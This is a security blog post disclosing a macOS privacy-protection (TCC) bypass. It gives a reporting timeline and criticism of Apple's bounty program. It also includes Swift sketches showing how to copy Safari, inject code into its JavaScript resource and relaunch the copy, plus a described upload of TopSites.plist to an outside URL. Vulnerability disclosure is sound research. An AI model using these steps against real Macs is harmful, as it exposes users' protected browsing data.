June 30, 2020 by Jeff Johnson
Support this blog: Link Unshortener, StopTheMadness, Underpass, PayPal.Me
Today I'm disclosing a macOS privacy protections bypass. (You may recall that I disclosed another one last year.) The privacy protections system (also known as TCC: Transparency, Consent, and Control) was introduced in macOS Mojave, and one of its purposes is to protect certain files on your Mac from access by unauthorized apps. I've discovered a way for an unauthorized app to read the contents of protected files, thus bypassing the privacy protections. This issue exists in Mojave, Catalina, and the Big Sur beta. It remains unaddressed and is therefore, in one sense, a zero-day. Here's the timeline leading to my disclosure:
- September 2019: I discovered the issue.
- December 19, 2019: The Apple Security Bounty Program finally opens.
- December 19, 2019: I reported the issue to Apple Product Security.
- January 17, 2020: In response to my status update request, Apple Product Security tells me they're planning to address the issue in Spring 2020.
- April 27, 2020: In response to my status update request, Apple Product Security tells me they're still investigating the issue.
- June 22, 2020: The macOS 11 Big Sur beta is released to developers.
- June 29, 2020: In response to my status update request, Apple Product Security tells me they're still investigating the issue.
For technical reasons, I don't believe that the issue will be fixed by Apple before Big Sur is released to the public in the Fall. I've seen no evidence that Big Sur makes any effort in this direction, and Apple's email to me shows no evidence of that either. Therefore, I'm disclosing the issue now. It's been over 6 months since I reported the issue to Apple. This is well beyond the bounds of "responsible disclosure", which is typically 90 days after reporting an issue to a vendor. It's also becoming obvious that I will never get paid a bounty by Apple for anything I've reported to them, or at least not within a reasonable amount of time. I'm not interested in waiting years for a bounty. I can't speak for anyone else, but my personal experience is that the Apple Security Bounty Program has been a disappointment, and I don't plan to participate again in the future. With that said, here's my original report to Apple Product Security:
Attached is a sample Xcode project that demonstrates how a user-installed Mac app can access the contents of files restricted by TCC, specifically in ~/Library/Safari. This exploit works on the current public shipping version, macOS 10.15.2. I've also tested it on macOS 10.14.6.
To reproduce, simply build and run the sample app. The sample app will read the file ~/Library/Safari/TopSites.plist and HTTP POST the contents of the file to http://lapcatsoftware.com/test/
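For context, here's a minimal sketch (mine, not part of the sample project) of what TCC normally blocks: an ordinary unauthorized app that tries to read this file directly should get a permission error, and that's exactly the protection the exploit routes around.

```swift
import Foundation

// Sketch only: a direct read of a TCC-protected file from an ordinary,
// unauthorized app. On Mojave/Catalina this is expected to fail with a
// permission error unless the app has been granted Full Disk Access.
let home = FileManager.default.homeDirectoryForCurrentUser
let topSites = home.appendingPathComponent("Library/Safari/TopSites.plist")

do {
    let data = try Data(contentsOf: topSites)
    print("Unexpectedly read \(data.count) bytes; this app has been granted access")
} catch {
    print("Direct read blocked, as expected: \(error.localizedDescription)")
}
```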
There are two fundamental flaws in TCC that make this exploit possible:
- TCC exceptions (recorded in "~/Library/Application Support/com.apple.TCC/TCC.db") are based on the bundle identifier of an app rather than the file path.
- TCC only superficially checks the code signature of the app.
Thus, an attacker can make a copy of an app at a different location on disk, modify the resources of the copy, and the copy of the app with modified resources will still have the same file access as the original app, in this case, Safari.
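To illustrate the second flaw, here's a rough sketch (mine, with a hypothetical path) showing that a full code signature verification does detect the kind of resource tampering that TCC's superficial check misses:

```swift
import Foundation

// Sketch only: run a deep, strict signature verification on a copied app.
// "/tmp/Modified Safari.app" is a hypothetical path to a tampered copy.
// codesign exits non-zero when a resource has been modified.
let copiedApp = "/tmp/Modified Safari.app"

let codesign = Process()
codesign.executableURL = URL(fileURLWithPath: "/usr/bin/codesign")
codesign.arguments = ["--verify", "--deep", "--strict", copiedApp]

do {
    try codesign.run()
    codesign.waitUntilExit()
    print(codesign.terminationStatus == 0
          ? "Signature verifies (resources unmodified)"
          : "Signature verification failed (resources were modified)")
} catch {
    print("Couldn't run codesign: \(error)")
}
```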
Safari has a particular issue that makes this exploit possible: it runs some JavaScript in the context of the main app rather than in the sandboxed context of the Web Content helper. The JavaScript that's run in the main app's context is used to display the Extensions pane in Safari Preferences. The main Safari app has access to the files in ~/Library/Safari, and thus any JavaScript run in that context also has this access.
My sample app makes a copy of the Safari app and replaces the file "Safari.app/Contents/Resources/HTMLViewController.js" with a modified version. You'll see the addition of 10 lines of code at the beginning of the file.
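The copy-and-modify step could look roughly like the following sketch. The destination path is arbitrary, and the injected snippet is a placeholder rather than the actual 10 lines from the sample project.

```swift
import Foundation

// Sketch only: copy Safari to a user-writable location and prepend code to
// one of its JavaScript resources. The destination path is arbitrary, and
// the injected snippet is a placeholder, not the sample project's code.
let fm = FileManager.default
let original = URL(fileURLWithPath: "/Applications/Safari.app")
let copy = fm.temporaryDirectory.appendingPathComponent("Modified Safari.app")

do {
    if fm.fileExists(atPath: copy.path) {
        try fm.removeItem(at: copy)
    }
    try fm.copyItem(at: original, to: copy)

    let script = copy.appendingPathComponent("Contents/Resources/HTMLViewController.js")
    let injected = "/* ~10 lines of attacker-controlled JavaScript go here */\n"
    let existing = try String(contentsOf: script, encoding: .utf8)
    try (injected + existing).write(to: script, atomically: true, encoding: .utf8)
} catch {
    print("Copy/modify failed: \(error)")
}
```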
The sample app contains a Safari extension whose sole purpose is to allow the use of the SafariServices API to open the Extensions pane in Safari Preferences. This only works with the original, unmodified Safari, so the sample app has a little workaround to make sure the pane opens in my modified Safari. It sets the NSQuitAlwaysKeepsWindows global preference so that windows open at quit are reopened on the next launch. Then it opens the Extensions pane in the original Safari and terminates the original Safari. As a consequence, when my modified Safari is launched, the Extensions pane automatically reopens, causing my modified JavaScript to run.
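That launch sequence might look something like the sketch below, meant to live inside the sample app rather than run as a standalone script. The extension identifier and the location of the modified copy are placeholders, and the real project presumably handles timing and error cases that I'm glossing over here.

```swift
import AppKit
import SafariServices

// Sketch only: persist window state across quit, have the real Safari show
// the Extensions pane, quit it, then launch the modified copy so the pane
// (and the modified JavaScript behind it) reopens automatically.
// "com.example.MyExtension" is a placeholder extension identifier.
func relaunchIntoModifiedSafari() {
    // Equivalent of `defaults write -g NSQuitAlwaysKeepsWindows -bool true`.
    let defaults = Process()
    defaults.executableURL = URL(fileURLWithPath: "/usr/bin/defaults")
    defaults.arguments = ["write", "-g", "NSQuitAlwaysKeepsWindows", "-bool", "true"]
    if (try? defaults.run()) != nil {
        defaults.waitUntilExit()
    }

    // Only works when this app bundles a Safari extension, and only with
    // the original, unmodified Safari.
    SFSafariApplication.showPreferencesForExtension(withIdentifier: "com.example.MyExtension") { _ in
        // Quit the original Safari so the Extensions pane is saved as window state.
        NSRunningApplication.runningApplications(withBundleIdentifier: "com.apple.Safari")
            .forEach { _ = $0.terminate() }

        // Launch the modified copy; the saved Extensions pane reopens in it.
        let copy = FileManager.default.temporaryDirectory
            .appendingPathComponent("Modified Safari.app")
        _ = try? NSWorkspace.shared.launchApplication(at: copy, options: [],
                                                      configuration: [:])
    }
}
```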
This exploit will work with any restricted file that is accessible to Safari.
Download Xcode project: SafariPrivacyTest.zip
Let me explain the issue in slightly less technical terms. In this case, only Safari and Finder should be authorized (by Apple) to access the files in ~/Library/Safari, unless you grant special authorization to another app, such as giving "Full Disk Access" to Terminal. My bypass demonstrates that a maliciously crafted app can also access those files, without being given authorization. There are actually two maliciously crafted apps here: a modified version of Safari, which accesses the protected files, and the app that modifies Safari and launches the modified version of Safari. Any app that you download from the web could accomplish this privacy protections bypass. My sample exploit uploads some of your private data (your Top Sites, for example) to a server that I control, because that's an easy thing to do when I can run any JavaScript I want. Note that I'm not really collecting any data, as http://lapcatsoftware.com/test/ is a dead link. I used http so that you can see the private data being sent in a packet trace.
Should you be worried about this issue? That depends on how you feel in general about macOS privacy protections. Prior to Mojave, the privacy protections feature did not exist at all on the Mac, so you're not any worse off now than you were on High Sierra and earlier. My personal opinion is that macOS privacy protections are mainly security theater that only harms legitimate Mac developers while allowing malware apps to bypass them through many existing holes, such as the one I'm disclosing and the ones other security researchers have found. I feel that if you already have a hostile non-sandboxed app running on your Mac, then you're in big trouble regardless, so these privacy protections won't save you. The best security is to be selective about which software you install and to be careful never to install malware on your Mac in the first place. There's a reason that my security research has focused on macOS privacy protections: my goal is to show that Apple's debilitating lockdown of the Mac is not justified by the alleged privacy and security benefits. In that respect, I think I've proved my point, over and over again. In any case, you have the right to know that the systems you rely on for protection are not actually protecting you.
Support this blog: Link Unshortener, StopTheMadness, Underpass, PayPal.Me